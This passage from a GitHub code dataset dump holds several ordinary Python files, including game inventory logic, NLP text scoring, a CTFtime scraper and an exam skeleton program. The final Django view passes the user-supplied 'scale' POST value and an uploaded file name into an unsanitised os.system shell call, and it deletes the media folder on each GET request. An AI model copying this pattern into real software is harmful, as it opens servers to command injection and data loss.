special cases\n >>> _choose_rate_coeff('unknown')\n >>> _choose_rate_coeff('whateverPT', quantity=4.0)\n 4.0\n\n \"\"\"\n if 'PT' in rate:\n return quantity\n elif 'M' in rate:\n return 1e6\n elif 'K' in rate:\n return 1e3\n\n # give up if we don't understand the input\n return None\n","repo_name":"theHausdorffMetric/test","sub_path":"kp_scrapers/spiders/charters/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13036885948","text":"# -*- coding: utf8 -*-\n\nfrom collections import defaultdict\nfrom pycraft.service.const import ContainerWindowID\nfrom pycraft.service.part.item import ItemID\nfrom .base import Container\n\n\nclass InventoryContainer(Container):\n \n SIZE = 36\n\n def __init__(self):\n super().__init__(ContainerWindowID.INVENTORY, self.SIZE)\n # TODO: indexを持たせる\n\n def add_item(self, item):\n \"\"\"Itemをslotsに保存する\n \n クライアントの実装では、indexが小さい方から詰めて保存する\n\n item : Item\n return : Itemを保存したslotsのindex(保存できないときは-1)\n \"\"\"\n empty_slot = None\n for i in range(self.SIZE):\n if self[i].id == item.id:\n count = self[i].count + item.count\n if count <= self[i].MAX_COUNT:\n self[i].count = count\n return i\n else:\n # 詰めた分は通知しなくてもクライアントが勝手に変更する\n diff = self[i].MAX_COUNT - self[i].count\n self[i].count = self[i].MAX_COUNT\n item.count -= diff\n elif self[i].id == ItemID.AIR:\n if empty_slot == None:\n empty_slot = i\n if empty_slot != None:\n self[empty_slot] = item\n return empty_slot\n return -1\n \n def use_item(self, i, target):\n \"\"\"Item を使用する\n \n i : slots の index\n target : Entity or Block (Item を使用する対象)\n return : Item が壊れたら True\n \"\"\"\n target.hit_item(self[i])\n if self[i].is_broken():\n self[i] = self.create_empty()\n return True\n return False\n\n def reduce_items(self, items):\n \"\"\"指定された Item を削除する\n \n return : generator((slot, is_empty))\n \"\"\"\n # 削除する個数を種類毎に数える\n counts = defaultdict(int)\n for item in items:\n if item.id != ItemID.AIR:\n counts[item.id] += item.count\n # 削除する\n updated = {}\n for slot, item in enumerate(self):\n if item.id in counts:\n before = self[slot].count\n self[slot].count -= counts[item.id]\n counts[item.id] = 0\n if self[slot].count < 0:\n counts[item.id] = -self[slot].count\n else:\n del counts[item.id]\n updated[slot] = before - self[slot].count\n # 足りなかった場合はロールバック\n if len(counts) > 0:\n for slot, count in updated:\n self[slot].count += count\n raise ValueError(\n '{name} does not have items.'.format(name=self.name))\n # 更新を確定し、個数 0 は empty に設定する\n for slot in updated.keys():\n if self[slot].count == 0:\n self[slot] = self.create_empty()\n yield slot, True\n else:\n yield slot, False\n\n\nclass ArmorContainer(Container):\n \n SIZE = 4\n\n def __init__(self):\n super().__init__(ContainerWindowID.ARMOR, self.SIZE)\n","repo_name":"nosix/PyCraft","sub_path":"src/pycraft/service/composite/container/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"33436659842","text":"## Librerías\n\n# Procesamiento de datos\nimport numpy as np\nimport pandas as pd\n\n# Herramientas de gramática\nimport language_tool_python\nimport contractions\nimport re\n\n# Procesamiento de lenguaje natural\nimport nltk\nfrom textblob import TextBlob, Word\nfrom textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer\n\n# Visualizaciones\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n## Cargo el dataset\n\ndf = pd.read_csv(\"text_data.csv\")\n\n## Paso 1: Procesamiento de los datos\n\ndef check_mistakes(text, tool = language_tool_python.LanguageTool('en-GB')): # Busco y corrijo los errores de un solo texto\n\n # Limpieza de formato\n\n pattern = r\"[^\\w\\.',]\"\n\n text = re.sub(pattern, \" \", text)\n\n text = re.sub(f\"[ ]+\", \" \", text)\n\n # Errores ortográficos y tipográficos \n\n spelling_mistakes = len(tool.check(text))\n\n text = tool.correct(text)\n\n # Deshacer contracciones\n \n contract = text.count(\"'\")\n\n correct_text = contractions.fix(text)\n\n return spelling_mistakes, contract, correct_text\n\ndef check_data(df): # Busco y corrijo los errores de todos los textos del DataFrame\n \n # Inicializo las listas\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n \n # Inica el servidor\n \n tool = language_tool_python.LanguageTool('en-GB') # Servidor local\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"full_text\"][i]\n\n spelling_mistakes, contract, correct_text = check_mistakes(text, tool)\n \n spelling_mistakes_list.append(spelling_mistakes)\n \n contract_list.append(contract)\n \n correct_text_list.append(correct_text)\n \n # Cierra el servidor\n \n tool.close() \n\n # Añado los valores al DataFrame\n \n df[\"correct_text\"] = np.array(correct_text_list)\n\n df[\"spelling_mistakes\"] = np.array(spelling_mistakes_list)\n \n df[\"contractions\"] = np.array(contract_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\ncorrect_df = check_data(df)\n\ncorrect_df.to_csv(\"corrected_text.csv\", index = False)\n\n## Paso 2: Procesamiento del lenguaje natural (NLP)\n\ndef get_metrics(text): # Obtengo las métricas de un solo texto\n\n # Numero de palabras por oracion\n\n sentences = len(nltk.sent_tokenize(text))\n\n words = len(nltk.word_tokenize(text))\n\n words_per_sent = words / sentences\n\n # Riqueza del lenguaje\n\n unique_words = len(set(nltk.word_tokenize(text)))\n\n richness = unique_words / words\n\n # Numero de palabras que aportan información\n\n stopwords = nltk.corpus.stopwords.words(\"english\")\n\n useful_words = list()\n\n # Elimino los signos de puntuación para analizar el texto\n\n pattern = r\"[^\\w\\d\\s]\"\n\n clean_text = re.sub(pattern, \" \", text)\n\n clean_text = re.sub(f\"[ ]+\", \" \", clean_text)\n\n for word in nltk.word_tokenize(clean_text):\n\n if word.casefold() not in stopwords :\n\n useful_words.append(word)\n\n informative = len(useful_words) / words\n \n # Análisis sintáxico / morfológico\n\n verb = [\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"]\n\n verb_list = list()\n\n adjective = [\"JJ\", \"JJR\", \"JJS\"]\n\n adjective_list = list()\n\n adverb = [\"RB\", \"RBR\", \"RBS\"]\n\n adverb_list = list()\n\n blob = TextBlob(text)\n\n for word in blob.tags:\n\n if word[1] in verb:\n\n v = Word(word[0]).lemmatize(\"v\")\n\n verb_list.append(v)\n\n elif word[1] in adjective:\n\n adjective_list.append(word[0])\n\n elif word[1] in adverb:\n\n 
adverb_list.append(word[0])\n\n # Tipos de palabras utilizadas\n\n unique_verbs = len(set(verb_list))\n\n unique_adjectives = len(set(adjective_list))\n\n unique_adverbs = len(set(adverb_list))\n \n # Análisis del sentimiento del texto\n\n blob = TextBlob(text, analyzer = PatternAnalyzer())\n\n polarity = blob.sentiment[0]\n\n subjectivity = blob.sentiment[1]\n \n # Análisis del sentimiento del texto\n\n #blob = TextBlob(text, analyzer = NaiveBayesAnalyzer())\n\n #positive = blob.sentiment[1]\n\n #negative = blob.sentiment[2]\n \n return words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity\n\ndef get_metrics_data(df): # Obtengo las métricas de todos los textos del DataFrame\n \n # Inicializo las listas\n \n words_per_sent_list = list()\n \n richness_list = list()\n \n informative_list = list()\n \n unique_verbs_list = list()\n \n unique_adjectives_list = list()\n \n unique_adverbs_list = list()\n \n polarity_list = list()\n \n subjectivity_list = list()\n \n spelling_mistakes_list = list()\n \n contract_list = list()\n \n correct_text_list = list()\n\n # Analizo los textos\n\n for i in range(len(df)):\n\n text = df[\"correct_text\"][i]\n\n words_per_sent, richness, informative, unique_verbs, unique_adjectives, unique_adverbs, polarity, subjectivity = get_metrics(text)\n \n words_per_sent_list.append(words_per_sent)\n \n richness_list.append(richness)\n \n informative_list.append(informative)\n\n unique_verbs_list.append(unique_verbs)\n\n unique_adjectives_list.append(unique_adjectives)\n\n unique_adverbs_list.append(unique_adverbs)\n\n polarity_list.append(polarity)\n \n subjectivity_list.append(subjectivity)\n\n # Añado los valores al DataFrame\n\n df[\"words_per_sent\"] = np.array(words_per_sent_list)\n \n df[\"richness\"] = np.array(richness_list)\n \n df[\"informative\"] = np.array(informative_list)\n\n df[\"unique_verbs\"] = np.array(unique_verbs_list)\n\n df[\"unique_adjectives\"] = np.array(unique_adjectives_list)\n\n df[\"unique_adverbs\"] = np.array(unique_adverbs_list)\n\n df[\"polarity\"] = np.array(polarity_list)\n \n df[\"subjectivity\"] = np.array(subjectivity_list)\n \n return df\n\n# Ejecuto el procesamiento de los datos del dataframe\n\nscored_df = get_metrics_data(correct_df)\n\nscored_df.to_csv(\"scored_text.csv\", index = False)\n","repo_name":"martabuaf/English-Text-Evaluation","sub_path":"text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25964291666","text":"#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom rich.console import Console\nfrom rich.table import Table\nfrom datetime import datetime\nimport argparse\nfrom sys import exit\nfrom rich import print\nfrom ctfl import __version__\n\n\ndef main():\n url = 'https://ctftime.org/event/list/upcoming'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5\\\n 37.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'\n }\n\n parser = parseArgs()\n args = parser.parse_args()\n\n months = {1: \"Jan\", 2: \"Feb\", 3: \"Mar\", 4: \"Apr\", 5: \"May\", 6: \"Jun\", 7: \"Jul\", 8: \"Aug\", 9: \"Sept\", 10: \"Oct\", 11: \"Nov\", 12: \"Dec\"}\n\n if (args.next):\n month = months[int(datetime.now().strftime(\"%m\")) + 1]\n elif (args.all):\n month = None\n elif (args.version):\n print(\"[bold]ctfl {}[/]\".format(__version__))\n exit(0)\n else:\n month = datetime.now().strftime(\"%b\")\n try:\n data = extract_data(url, headers, month)\n print_data(data)\n except KeyboardInterrupt:\n exit(1)\n except Exception:\n print(\"[[bold red]-[/]] Unexpected error occurred, Try again...\")\n\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description=\"CTFTime Upcoming CTF Events Lists\")\n group = parser.add_mutually_exclusive_group(required=False)\n group.add_argument(\n \"-n\",\n \"--next\",\n action=\"store_true\",\n help=\"Get the list of events for the next month\"\n )\n group.add_argument(\n \"-a\",\n \"--all\",\n action=\"store_true\",\n help=\"List all available CTFs on the event list\"\n )\n group.add_argument(\n \"-v\",\n \"--version\",\n action=\"store_true\",\n help=\"Prints the version of the tool\"\n )\n return parser\n\n\ndef extract_data(url, headers, month):\n req = requests.get(url, headers=headers)\n\n soup = BeautifulSoup(req.text, 'html.parser')\n events_table = soup.find_all('table')[0]\n\n names = []\n dates = []\n styles = []\n locations = []\n weights = []\n links = []\n base_link = \"https://ctftime.org\"\n\n if (month is not None):\n for i in events_table.find_all('tr')[1::]:\n columns = i.find_all('td')\n date = columns[1].text.strip()\n if (month in date):\n dates.append(date)\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n else:\n pass\n else:\n for i in events_table.find_all('tr')[1:]:\n columns = i.find_all('td')\n names.append(columns[0].a.text.strip())\n links.append(base_link + columns[0].a.get('href').strip())\n dates.append(columns[1].text.strip())\n styles.append(columns[2].text.strip())\n locations.append(columns[3].text.strip())\n weights.append(columns[4].text.strip())\n\n data = [names, dates, styles, locations, weights, links]\n return data\n\n\ndef print_data(data):\n table = Table(title=\"CTFTime CTF Events\")\n\n table.add_column(\"Name\", justify=\"left\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Date\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Style\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Location\", justify=\"center\", style=\"cyan\")\n table.add_column(\"Weight\", justify=\"right\", style=\"cyan\")\n\n for i in range(len(data[0])):\n table.add_row(data[0][i], data[1][i], data[2][i], data[3][i], data[4][i], style=\"link \" + data[5][i])\n\n console = Console()\n console.print(table)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"thehackersbrain/ctfl","sub_path":"ctfl/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73247650889","text":"# Problem: https://leetcode.com/problems/missing-number/\n\n# Complexity: O(n) time, O(n) space\n\nfrom typing import Dict, List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n keys: Dict[int, int] = {}\n\n for n in nums:\n keys[n] = 1\n\n for i in range(len(nums)+1):\n if i not in keys:\n return i\n\n # Should not get here\n return -1\n","repo_name":"emmaneugene/algos","sub_path":"leetcode/blind75/missingNumber.py","file_name":"missingNumber.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"31216974063","text":"\"\"\"\nTabela de emojis Unicode: https://apps.timwhitlock.info/emoji/tables/unicode\n\nOriginal: U+1F60D\nModificado: U0001F60D => mantém o U e acrescenta 3 zeros e replica o resto do código.\n\nPara executar 1 vez\n for num in range(1, 11):\n print('\\U0001F60D' * num)\nSe quiser executar 3 vezes\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n\n\"\"\"\n\n\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n","repo_name":"vanderleikoziol/koziol-git1","sub_path":"secao06/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"346030845","text":"import argparse\nimport pandas as pd\nfrom vcsl import *\nfrom torch.utils.data import DataLoader\nfrom loguru import logger\nfrom itertools import product, islice\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--query-file\", \"-Q\", type=str, help=\"data file\")\n parser.add_argument(\"--reference-file\", \"-G\", type=str, help=\"data file\")\n parser.add_argument(\"--pair-file\", type=str, help=\"data file\")\n\n parser.add_argument(\"--input-store\", type=str, help=\"store of input data: oss|local\", default=\"oss\")\n parser.add_argument(\"--input-root\", type=str, help=\"root path of input data\", default=\"\")\n\n parser.add_argument(\"--oss-config\", type=str, default='~/ossutilconfig-copyright', help=\"url path\")\n parser.add_argument(\"--batch-size\", \"-b\", type=int, default=32, help=\"batch size\")\n parser.add_argument(\"--data-workers\", type=int, default=16, help=\"data workers\")\n parser.add_argument(\"--request-workers\", type=int, default=4, help=\"data workers\")\n parser.add_argument(\"--output-root\", type=str, help=\"output root\")\n parser.add_argument(\"--output-store\", type=str, help=\"store of output data: oss|local\")\n\n # Hyper parameters or input model\n parser.add_argument(\"--alignment-method\", type=str, default=\"DTW\", help=\"DTW, DP, TN alignment method\")\n\n parser.add_argument(\"--min-length\", type=int, default=5, help=\"minimum length of one segment\")\n parser.add_argument(\"--sum-sim\", type=float, default=10., help=\"minimum accumulated sim of one segment\")\n parser.add_argument(\"--ave-sim\", type=float, default=0.3, help=\"average sim of one segment\")\n parser.add_argument(\"--min-sim\", type=float, default=0.2, help=\"minimum average sim of one segment\")\n\n parser.add_argument(\"--max-path\", type=int, default=10, help=\"maximum number of paths to predict\")\n parser.add_argument(\"--discontinue\", type=int, default=3, help=\"max discontinue point in path\")\n parser.add_argument(\"--max-iou\", type=float, default=0.3, help=\"max iou to filter bboxes\")\n\n parser.add_argument(\"--diagonal-thres\", type=int, default=10, help=\"threshold for discarding a vertical/horizontal part of a segment for DP\")\n\n parser.add_argument(\"--tn-top-K\", type=int, default=5, help=\"top k nearest for TN\")\n parser.add_argument(\"--tn-max-step\", type=int, default=10, help=\"max step for TN\")\n\n parser.add_argument(\"--spd-model-path\", type=str, help=\"SPD model path\")\n parser.add_argument(\"--device\", type=str, help=\"cpu or cuda:0 or others, only valid to SPD inference\")\n parser.add_argument(\"--spd-conf-thres\", type=float, default=0.5, help=\"bounding box conf filter for SPD inference\")\n\n\n parser.add_argument(\"--params-file\", type=str)\n\n parser.add_argument(\"--result-file\", default=\"pred.json\", type=str, help=\"result path\")\n\n args = parser.parse_args()\n\n pairs, files_dict, query, reference = None, None, None, None\n if args.pair_file:\n df = pd.read_csv(args.pair_file)\n pairs = df[['query_id', 'reference_id']].values.tolist()\n\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n else:\n query = pd.read_csv(args.query_file)\n query = query[['uuid']].values.tolist()\n\n reference = pd.read_csv(args.reference_file)\n reference = reference[['uuid']].values.tolist()\n\n pairs = product(query, reference)\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n\n config = dict()\n if args.input_store == 'oss':\n 
config['oss_config'] = args.oss_config\n\n dataset = ItemDataset(data_list,\n store_type=args.input_store,\n data_type=DataType.NUMPY.type_name,\n root=args.input_root,\n trans_key_func=lambda x: x + '.npy',\n **config)\n\n logger.info(f\"Data to run {len(dataset)}\")\n\n loader = DataLoader(dataset, collate_fn=lambda x: x,\n batch_size=args.batch_size,\n num_workers=args.data_workers)\n\n model_config = dict()\n if args.alignment_method.startswith('DTW'):\n model_config = dict(\n discontinue=args.discontinue,\n min_sim=args.min_sim,\n min_length=args.min_length,\n max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('TN'):\n model_config = dict(\n tn_max_step=args.tn_max_step, tn_top_k=args.tn_top_K, max_path=args.max_path,\n min_sim=args.min_sim, min_length=args.min_length, max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('DP'):\n model_config = dict(discontinue=args.discontinue,\n min_sim=args.min_sim,\n ave_sim=args.ave_sim,\n min_length=args.min_length,\n diagonal_thres=args.diagonal_thres)\n elif args.alignment_method.startswith('HV'):\n model_config = dict(min_sim=args.min_sim, iou_thresh=args.max_iou)\n elif args.alignment_method.startswith('SPD'):\n model_config = dict(model_path=args.spd_model_path,\n conf_thresh=args.spd_conf_thres,\n device=args.device)\n else:\n raise ValueError(f\"Unknown VTA method: {args.alignment_method}\")\n\n # override model config with param file\n if args.params_file:\n reader = build_reader(args.input_store, DataType.JSON.type_name, **config)\n param_result = reader.read(args.params_file)\n best_params = param_result['best']\n logger.info(\"best param {}\", best_params)\n model_config = best_params['param']\n\n model = build_vta_model(method=args.alignment_method, concurrency=args.request_workers, **model_config)\n\n total_result = dict()\n for batch_data in islice(loader, 0, None):\n logger.info(\"data cnt: {}, {}\", len(batch_data), batch_data[0][0])\n batch_result = model.forward_sim(batch_data)\n logger.info(\"result cnt: {}\", len(batch_result))\n\n for pair_id, result in batch_result:\n total_result[pair_id] = result\n\n output_store = args.input_store if args.output_store is None else args.output_store\n if output_store == 'local' and not os.path.exists(args.output_root):\n os.makedirs(args.output_root, exist_ok=True)\n writer = build_writer(output_store, DataType.JSON.type_name, **config)\n writer.write(os.path.join(args.output_root, args.result_file), total_result)\n","repo_name":"ant-research/VCSL","sub_path":"run_video_vta.py","file_name":"run_video_vta.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"16"}
+{"seq_id":"23300989922","text":"# Skeleton Program for the AQA AS1 Summer 2020 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA AS1 Programmer Team\r\n# developed in a Python 3 environment\r\n\r\n# Version number: 0.0.0\r\n\r\nEMPTY_STRING = \"\"\r\nMAX_WIDTH = 100\r\nMAX_HEIGHT = 100\r\n\r\nclass FileHeader:\r\n \"\"\"\r\n Parameters: self\r\n Description: Creates an object with a title, width, height and filetype\r\n \"\"\"\r\n def __init__(self):\r\n self.Title = EMPTY_STRING\r\n self.Width = MAX_WIDTH\r\n self.Height = MAX_HEIGHT\r\n self.FileType = EMPTY_STRING \r\n\r\ndef DisplayError(ErrorMessage):\r\n \"\"\"\r\n Parameters: String\r\n Description: Takes in a string as an error message displays it\r\n \"\"\"\r\n print(\"Error: \", ErrorMessage)\r\n\r\ndef PrintHeading(Heading):\r\n \"\"\"\r\n Parameters: String\r\n Description: Displays the heading underlined with equal symbols\r\n \"\"\"\r\n print(Heading)\r\n HeadingLength = len(Heading)\r\n for Position in range(1, HeadingLength + 1):\r\n print('=', end='')\r\n print()\r\n\r\ndef DisplayImage(Grid, Header):\r\n \"\"\"\r\n Parameters: List, Object\r\n Description: Prints image heading, then prints/displays the image\r\n \"\"\"\r\n print()\r\n PrintHeading(Header.Title)\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n print(Grid[ThisRow][ThisColumn], end='')\r\n print()\r\n\r\ndef SaveImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D list, Object\r\n Description: \r\n \"\"\"\r\n print(\"The current title of your image is: \" + Header.Title)\r\n Answer = input(\"Do you want to use this as your filename? (Y/N) \")\r\n if Answer == \"N\" or Answer == \"n\":\r\n FileName = input(\"Enter a new filename: \")\r\n else:\r\n FileName = Header.Title\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.write('\\n')\r\n FileOut.close()\r\n\r\ndef EditImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List\r\n Description: Allows user to edit the image by changing one of the symbols to another \r\n \"\"\"\r\n DisplayImage(Grid, Header)\r\n Answer = EMPTY_STRING\r\n while Answer != \"N\":\r\n Symbol = EMPTY_STRING\r\n NewSymbol = EMPTY_STRING\r\n while len(Symbol) != 1:\r\n Symbol = input(\"Enter the symbol you want to replace: \")\r\n while len(NewSymbol) != 1:\r\n NewSymbol = input(\"Enter the new symbol: \")\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n if Grid[ThisRow][ThisColumn] == Symbol:\r\n Grid[ThisRow][ThisColumn] = NewSymbol\r\n DisplayImage(Grid, Header)\r\n Answer = input(\"Do you want to make any further changes? 
(Y/N) \")\r\n return Grid\r\n\r\ndef ConvertChar(PixelValue):\r\n \"\"\"\r\n Parameters: Integer\r\n Return Type: String\r\n Description: Returns a character based on the value of the pixel put in\r\n \"\"\"\r\n if PixelValue <= 32:\r\n AsciiChar = '#'\r\n elif PixelValue <= 64:\r\n AsciiChar = '&'\r\n elif PixelValue <= 96:\r\n AsciiChar = '+'\r\n elif PixelValue <= 128:\r\n AsciiChar = ';'\r\n elif PixelValue <= 160:\r\n AsciiChar = ':'\r\n elif PixelValue <= 192:\r\n AsciiChar = ','\r\n elif PixelValue <= 224:\r\n AsciiChar = '.'\r\n else:\r\n AsciiChar = ' '\r\n return AsciiChar\r\n\r\ndef LoadGreyScaleImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using each pixel and a specific code assigned to each pixel\r\n \"\"\"\r\n try:\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n NextPixel = FileIn.readline()\r\n PixelValue = int(NextPixel)\r\n Grid[Row][Column] = ConvertChar(PixelValue)\r\n except:\r\n DisplayError(\"Image data error\") \r\n return Grid\r\n \r\ndef LoadAsciiImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using the width and height of the heading as dimensions\r\n \"\"\"\r\n try:\r\n ImageData = FileIn.readline()\r\n NextChar = 0\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n Grid[Row][Column] = ImageData[NextChar]\r\n NextChar += 1\r\n except:\r\n DisplayError(\"Image data error\")\r\n return Grid\r\n\r\ndef LoadFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List, Object\r\n Description: Opens the file in read mode, and then splits each line into fields and loads an asciiImage or greyscaleimage as the grid depending on the filetype of the header, and then checks if the file exists, and finally returns the grid\r\n \"\"\"\r\n FileFound = False\r\n FileTypeOK = False\r\n FileName = input(\"Enter filename to load: \")\r\n try:\r\n FileIn = open(FileName + \".txt\", 'r')\r\n FileFound = True\r\n HeaderLine = FileIn.readline()\r\n Fields = HeaderLine.split(',')\r\n Header.Title = Fields[0]\r\n Header.Width = int(Fields[1])\r\n Header.Height = int(Fields[2])\r\n Header.FileType = Fields[3]\r\n Header.FileType = Header.FileType[0]\r\n if Header.FileType == 'A': \r\n Grid = LoadAsciiImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n elif Header.FileType == 'G': \r\n Grid = LoadGreyScaleImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n FileIn.close()\r\n if not FileTypeOK:\r\n DisplayError(\"Unknown file type\")\r\n else:\r\n DisplayImage(Grid, Header)\r\n except:\r\n if not FileFound:\r\n DisplayError(\"File not found\")\r\n else:\r\n DisplayError(\"Unknown error\")\r\n return Grid, Header\r\n\r\ndef SaveFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Description: Opens a file required by the user in write mode, then writes each field to the file separated by commas, and also writes the grid to the file, and then closes it\r\n \"\"\"\r\n FileName = input(\"Enter filename: \")\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + ',' + str(Header.Width) + ',' + str(Header.Height) + ',' + 'A' + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.close()\r\n\r\ndef ClearGrid(Grid):\r\n \"\"\"\r\n Parameters: 2D List\r\n Return Type: 2D List\r\n Description: Clears the grid by 
replacing each pixel with a . and returns it\r\n \"\"\"\r\n for Row in range(MAX_HEIGHT):\r\n for Column in range(MAX_WIDTH):\r\n Grid[Row][Column] = '.'\r\n return Grid\r\n \r\ndef DisplayMenu():\r\n \"\"\"\r\n Description: Displays the main menu screen\r\n \"\"\"\r\n print()\r\n print(\"Main Menu\")\r\n print(\"=========\")\r\n print(\"L - Load graphics file\") \r\n print(\"D - Display image\")\r\n print(\"E - Edit image\")\r\n print(\"S - Save image\")\r\n print(\"X - Exit program\") \r\n print()\r\n\r\ndef GetMenuOption():\r\n \"\"\"\r\n Return Type: String\r\n Description: Asks the user to enter their menu option and returns it\r\n \"\"\"\r\n MenuOption = EMPTY_STRING\r\n while len(MenuOption) != 1:\r\n MenuOption = input(\"Enter your choice: \")\r\n return MenuOption\r\n \r\ndef Graphics():\r\n \"\"\"\r\n Description: Displays the menu, then asks for a menu option, then does the according function depending on the user's selected option, then saves the file\r\n \"\"\"\r\n Grid = [['' for Column in range(MAX_WIDTH)] for Row in range(MAX_HEIGHT)]\r\n Grid = ClearGrid(Grid)\r\n Header = FileHeader()\r\n ProgramEnd = False\r\n while not ProgramEnd:\r\n DisplayMenu()\r\n MenuOption = GetMenuOption()\r\n if MenuOption == 'L':\r\n Grid, Header = LoadFile(Grid, Header)\r\n elif MenuOption == 'D':\r\n DisplayImage(Grid, Header) \r\n elif MenuOption == 'E':\r\n Grid = EditImage(Grid, Header) \r\n elif MenuOption == 'S': \r\n SaveImage(Grid, Header)\r\n elif MenuOption == 'X':\r\n ProgramEnd = True\r\n else:\r\n print(\"You did not choose a valid menu option. Try again\")\r\n print(\"You have chosen to exit the program\")\r\n Answer = input(\"Do you want to save the image as a graphics file? (Y/N) \")\r\n if Answer == \"Y\" or Answer == \"y\":\r\n SaveFile(Grid, Header)\r\n \r\nif __name__ == \"__main__\":\r\n Graphics() \r\n","repo_name":"Usman198316/Programming-Challenges","sub_path":"2020 Pre-Release/A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_name":"A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5079137045","text":"from django.http import HttpResponse \nfrom django.shortcuts import render, redirect\nimport os\nfrom home import forms\nfrom django.views.generic import TemplateView\nimport os\n\nclass Index(TemplateView):\n template_name = 'home/index.html'\n\ndef ShipDetection_view(request):\n if request.method == 'POST': \n form = forms.ShipForm(request.POST, request.FILES) \n \n if form.is_valid(): \n form.save() \n scale = request.POST.get(\"scale\")\n return predict(request, scale)\n else:\n print(os.getcwd())\n os.system('rm -r ./media/images/')\n form = forms.ShipForm() \n return render(request, 'home/im.html', {'form' : form}) \n\n \ndef predict(request, scale): \n path = os.getcwd()\n\n ls = os.listdir('./media/images/')\n os.chdir(path + '/home/model/SIH5/model/darknet/')\n os.system('python3 r3unfile.py ' + path + '/media/images/' + str(ls[0] + ' ' + path) + ' ' + str(scale))\n os.chdir(path + '/')\n return render(request, 'home/display_images.html')\n\n\ndef Upload(request):\n image = request.POST.get('image')\n print(type(image))\n return render(request, 'home/upload_image.html')\n\ndef display_ship_images(request): \n \n if request.method == 'GET': \n return render(request, 'home/display_images.html')\n","repo_name":"himdhiman/SIH-2020-Ship_Detection-Project-ISRO","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
